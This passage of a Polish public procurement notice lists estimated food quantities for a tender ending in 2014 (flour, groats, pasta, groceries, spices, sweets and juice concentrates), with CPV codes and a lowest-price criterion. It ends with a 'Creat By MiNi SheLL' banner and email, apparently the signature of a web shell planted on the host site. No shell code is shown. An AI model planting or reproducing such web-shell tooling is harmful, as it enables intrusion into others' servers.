Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część VII. Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRODUKTY PRZEMIAŁU ZIARNA, SKROBI I PRODUKTÓW SKROBIOWYCH; PRODUKTY MĄCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna poznańska kg 7; Mąka żytnia kg 20; Mąka tortowa typ 450 kg 140; Mąka krupczatka typ 450 kg 82; Mąka ziemniaczana 500g szt. 20; Ryż kg 144; Ryż w kartonie 4x100g szt. 799;Ryż brązowy w kartonie 4x100g szt. 20; Kasza manna błyskawiczna 400g szt. 60; Kasza jęczmienna średnia 500g szt. 40; Kasza jęczmienna średnia 900g szt. 52; Kasza jęczmienna średnia w kartonie 4x100g szt. 676; Kasza jaglana 400g szt. 44;Kasza gryczana w kartonie 4x100g szt. 162; Kasza gryczana biała 400g szt. 44; Kasza pęczak 500g szt. 16; Makaron nitka 250g szt. 40;  Makaron gwiazdki 250g szt. 32 Makaron Lubella świderki nr 19, 500g szt. 1660; Makaron różne wzory 500g,szt. 220; Makaron pełnoziarnisty świderki 400g szt. 155;
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załacznik nr 5 do SIWZ część VIII. 
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.85.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE, OLEJE, TŁUSZCZE ROŚLINNE, PRZETWORZONE OWOCE, PRODUKTY CUKROWNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koncentrat pomidorowy 30% 950g szt. 170; koncentrat pomidorowy 30% 200g szt. 40; koncentrat pomidorowy 180g szt. 30; Ketchup łagodny 480g wyciskany szt. 8; Musztarda 190g szt. 5; bułka tarta kg 115; Buraczki ćwikłowe tarte 370g szt. 54; Buraczki ćwikłowe wiórki 500g szt. 1272; Sałatka obiadowa 0,9l szt. 570; Sałatka z kapusty czerwonej 0,9l szt. 196; Ogórki konserwowe 0,9l szt. 386; Świeże surówki wielowarzywne luz kg 650; Powidło śliwkowe 320g szt. 32; Jabłka prażone 780g szt. 568; Dżem niskosłodzony różne smaki (truskawkowy/brzoskwiniowy/wiśniowy) 280g szt. 1250; Olej uniwersalny rzepakowy 1l szt. 150; Olej uniwersalny rzepakowy 3l szt. 210; Oliwa z oliwek extra vergine 1l szt. 30; Oliwa z oliwek extra vergine 500g szt. 15; Drożdże 100 g szt. 25; Przyprawa do potraw 1kg szt. 37; Przyprawa do zup w płynie 1l szt. 75, Sól kg 223; Sól morska kg 20; Pieprz mielony 20g szt. 75; Pieprz mielony 50g szt. 30; Cukier kryształ biały kg 115; Cukier puder 400g szt. 9, Cukier waniliowy 30g szt. 60; Soda oczyszczona 80g szt. 16; Proszek do pieczenia 30g szt. 16; Koper susz 25g szt. 220; Pietruszka 25g szt. 150; Curry 20g szt.7; Kurkuma 20g szt. 19; Cynamon 15g szt. 3; Gałka muszkatałowa 10g szt. 5; Majeranek 8g szt. 20; Liść laurowy 6g szt. 14; Ziele angielskie 15g szt. 8; Kminek 20g szt. 17; Tymianek 10g szt. 10; Bazylia 10g szt. 10; Zioła prowansalskie 10g szt. 10; Cząber 10g szt. 10; Cebulka prażona 15g szt. 19; Warzywa suszona 100g szt. 19; Czosnek granulowany 20g szt. 20; Przyprawa do kurczaka 30g szt. 45, Chrzan biały 180g szt. 15; Rosół z kury kostki 60g szt. 20; barszcz Biąły butelka 480ml szt. 375; Zupa pieczarkowa 45g szt. 300; Zupa borowikowa 45g szt. 300; Zupa barszcz biały 66g szt. 375; Sos pieczeniowy jasny 27g szt. 30; Sos pieczeniowy ciemny 30g szt. 485; Fix do gołąbków 64g szt. 16; Sos sałatkowy 9g szt. 120; Kukurydza w puszce 400g szt. 8; ser żółty edamski kg 20; Groszek ptysiowy 70g szt. 20; Owoce suszone- jabłka kg 4; Owoce suszone -  śliwki kg 3; Podgrzybek suszony kg 7; Ciastka deserowe luz różne wzory kg 10; Kinder czekolada 50g szt. 78; Kinder Mleczna Kanapka 28g szt. 250; Serki owocowe Danio 160g szt. 78; Jogurty owocowe 150g szt. 78; Mieszanka truflowa kg 15; galaretka w czekoladzie kg 25; Czekolada mleczna różne smaki 100g szt. 678; napój Kubuś Play 400ml szt. 750; Sok Kubuś Go 300ml szt. 150; napój owocowy z rurką 200ml szt. 3700; Napój owocowy samozamykający się 330 ml szt. 670; Wafelek w czekoladzie 35g szt. 230; Baton w czekoladzie 48g szt. 230; Baton Snickers, Twix, Mars 47-50g szt. 680.
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w ofercie cenowej, która stanowi załącznik nr 5 do SIWZ część IX. 
Wielkości podane w załączniku nr 5 są wielkościami szacunkowymi (przewidywanymi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.40.00.00-2, 15.33.21.00-5, 15.83.30.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> SOKI SKONCENTROWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sok skoncentrowany 430ml różne smaki - extrakt  z owoców min 66% szt. 640.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.32.18.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com